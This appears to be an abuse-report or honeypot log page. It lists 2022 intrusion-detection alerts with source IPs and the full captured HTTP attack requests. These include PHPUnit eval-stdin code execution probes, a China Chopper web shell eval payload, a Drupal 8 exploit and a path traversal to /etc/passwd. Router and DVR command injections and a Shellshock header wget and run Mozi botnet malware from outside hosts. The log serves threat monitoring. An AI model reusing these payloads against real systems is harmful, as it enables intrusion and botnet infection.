๐บ๐ธ
20.127.8.35
19 Apr 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-04-19T19:52:07.661Z
{
GET /vendor/ph ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-04-19T19:52:07.661Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 19
}
show less
Web App Attack
๐ญ๐ฐ
103.158.161.96
12 Apr 2022
MALWARE-CNC Win.Backdoor.Chopper web shell connection
2022-04-12T18:20:33.792Z
{
POST /mysql.bak. ...
show more
MALWARE-CNC Win.Backdoor.Chopper web shell connection
2022-04-12T18:20:33.792Z
{
POST /mysql.bak.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: /mysql.bak.php
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Content-Length: 229
POST /mysql.bak.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: /mysql.bak.php
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Content-Length: 229
x=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztlY2hvICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ107ZWNobygifDwtIik7ZGllKCk7x=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzt
}
show less
Hacking
Exploited Host
๐ฐ๐ท
1.176.228.250
07 Apr 2022
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-04-07T13:45:37.1 ...
show more
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-04-07T13:45:37.131Z
{
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://1[.]176[.]228[.]250[:]56284/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
}
show less
Hacking
Web App Attack
๐ฑ๐ป
81.198.64.174
29 Mar 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-29T18:54:41.789Z
{
POST //vendor/ ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-29T18:54:41.789Z
{
POST //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Content-Length: 26
Content-Type: multipart/form-data
<?php echo php_uname(); ?>
}
show less
Hacking
Web App Attack
๐ซ๐ท
178.33.213.177
28 Mar 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-27T21:40:07.113Z
{
POST //sites/a ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-27T21:40:07.113Z
{
POST //sites/all/libraries/PHP-API-Wrapper/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
<?php phpinfo();
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
116.68.99.196
22 Mar 2022
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-03-22T17:34:09.0 ...
show more
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-03-22T17:34:09.090Z
{
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://116[.]68[.]99[.]196[:]36396/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
}
show less
Web App Attack
๐ญ๐ฐ
43.135.123.195
22 Mar 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-22T06:05:26.946Z
{
POST /vendor/p ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-22T06:05:26.946Z
{
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Content-Length: 52
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
<?=md5('negetfzq');echo strtoupper(php_uname('s'))?>
}
show less
Hacking
Web App Attack
๐ณ๐ฑ
185.222.57.168
21 Mar 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-21T10:09:40.714Z
{
GET /vendor/ph ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-21T10:09:40.714Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Content-Length: 18
<?php phpinfo();?>
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
59.97.168.167
10 Mar 2022
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-03-10T13:58:05.0 ...
show more
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-03-10T13:58:05.094Z
{
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://59[.]97[.]168[.]167[:]52198/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
117.252.208.58
10 Mar 2022
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt
2022-03-10T10:38:38.173Z ...
show more
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt
2022-03-10T10:38:38.173Z
{
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117[.]252[.]208[.]58[:]38266/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
}
show less
Hacking
Web App Attack
๐ณ๐ฑ
159.223.1.222
08 Mar 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-07T21:47:59.409Z
{
GET /vendor/ph ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-07T21:47:59.409Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 18
<?php phpinfo();?>
}
show less
Hacking
Web App Attack
๐ญ๐ฐ
180.150.157.106
06 Mar 2022
SERVER-WEBAPP Drupal 8 remote code execution attempt
2022-03-06T09:03:44.808Z
{
POST /%75%73%65%7 ...
show more
SERVER-WEBAPP Drupal 8 remote code execution attempt
2022-03-06T09:03:44.808Z
{
POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
%66%6f%72%6d%5f%69%64=%75%73%65%72%5f%72%65%67%69%73%74%65%72%5f%66%6f%72%6d&%5f%64%72%75%70%61%6c%5f%61%6a%61%78=1&%74%69%6d%65%7a%6f%6e%65%5b%61%5d%5b%23%6c%61%7a%79%5f%62%75%69%6c%64%65%72%5d%5b%5d=%61%73%73%65%72%74&%74%69%6d%65%7a%6f%6e%65%5b%61%5d%5b%23%6c%61%7a%79%5f%62%75%69%6c%64%65%72%5d%5b%5d%5b%5d=die(md5(DIRECTORY_SEPARATOR))
}
show less
Hacking
Web App Attack
๐ฎ๐ฉ
125.161.108.253
02 Mar 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-02T08:41:50.996Z
{
POST //www/ven ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-03-02T08:41:50.996Z
{
POST //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
user-agent: Mozilla/5.0 (Linux i386; X11) Gecko/20080311 Firefox/11.0
accept-encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
referer: https://www.google.com/
accept-language: en-US,en;q=0.9
Content-Length: 44
<?php echo 'RCE_VULN|'; echo php_uname();?>
}
show less
Hacking
Web App Attack
๐น๐ญ
1.20.250.66
02 Mar 2022
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-03-02T07:44:35.245Z
{
GE ...
show more
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-03-02T07:44:35.245Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
User-Agent: Hello, world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Hacking
Web App Attack
๐ซ๐ท
80.248.218.226
24 Feb 2022
OS-OTHER Bash CGI environment variable injection attempt
2022-02-24T21:20:17.281Z
{
GET HTTP/1.1 ...
show more
OS-OTHER Bash CGI environment variable injection attempt
2022-02-24T21:20:17.281Z
{
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXZCDSZ"';system("wget -O /tmp/a.gif http[:]//sprunge[.]us/UMWefq;curl -O /tmp/a.gif http[:]//sprunge[.]us/UMWefq; lwp-download -a http[:]//sprunge[.]us/UMWefq /tmp/a.gif;perl /tmp/a.gif;rm -rf /tmp/a.gif*;exit")
Connection: Close
}
show less
Hacking
๐บ๐ธ
20.85.216.119
24 Feb 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-02-24T20:18:43.431Z
{
GET /vendor/ph ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-02-24T20:18:43.431Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 19
}
show less
Hacking
Web App Attack
๐ช๐ฌ
197.42.9.76
24 Feb 2022
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-24T18:39:14.676Z
{
GE ...
show more
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-24T18:39:14.676Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+ http://2[.]56[.]57[.]7/.s4y/arm;sh+/tmp/arm HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Hacking
Web App Attack
๐ฎ๐ท
37.143.147.248
24 Feb 2022
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-24T18:07:30.478Z
{
GE ...
show more
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-24T18:07:30.478Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+ http://2[.]56[.]57[.]7/.s4y/arm;sh+/tmp/arm HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
117.205.170.93
24 Feb 2022
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-24T00:30:35.494Z
{
GE ...
show more
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-24T00:30:35.494Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+ http://2[.]56[.]57[.]7/.s4y/arm;sh+/tmp/arm HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
117.196.22.20
24 Feb 2022
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-02-24T12:15:44.3 ...
show more
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-02-24T12:15:44.316Z
{
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117[.]196[.]22[.]20[:]50748/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
}
show less
Hacking
Web App Attack
๐น๐ผ
123.205.148.8
22 Feb 2022
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-22T17:25:08.927Z
{
GE ...
show more
SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt
2022-02-22T17:25:08.927Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+ http://2[.]56[.]57[.]7/.s4y/arm;sh+/tmp/arm HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Web App Attack
๐ฎ๐ณ
103.41.44.194
21 Feb 2022
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt
2022-02-21T12:47:03.354Z ...
show more
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt
2022-02-21T12:47:03.354Z
{
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103[.]41[.]44[.]194[:]60708/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
}
show less
Hacking
Web App Attack
๐บ๐ธ
104.238.221.70
18 Feb 2022
SERVER-WEBAPP Apache HTTP Server httpd directory traversal attempt
2022-02-18T00:18:45.038Z
{
GET ...
show more
SERVER-WEBAPP Apache HTTP Server httpd directory traversal attempt
2022-02-18T00:18:45.038Z
{
GET /cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd HTTP/1.1
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
103.66.208.169
18 Feb 2022
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-02-18T00:05:32.1 ...
show more
SERVER-WEBAPP GPON Router authentication bypass and command injection attempt
2022-02-18T00:05:32.108Z
{
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://103[.]66[.]208[.]169[:]44835/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
}
show less
Hacking
Web App Attack
๐ธ๐ฌ
185.201.8.75
17 Feb 2022
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-02-17T16:19:33.342Z
{
GET /vendor/ph ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt
2022-02-17T16:19:33.342Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Content-Length: 18
<?php phpinfo();?>
}
show less
Hacking
Web App Attack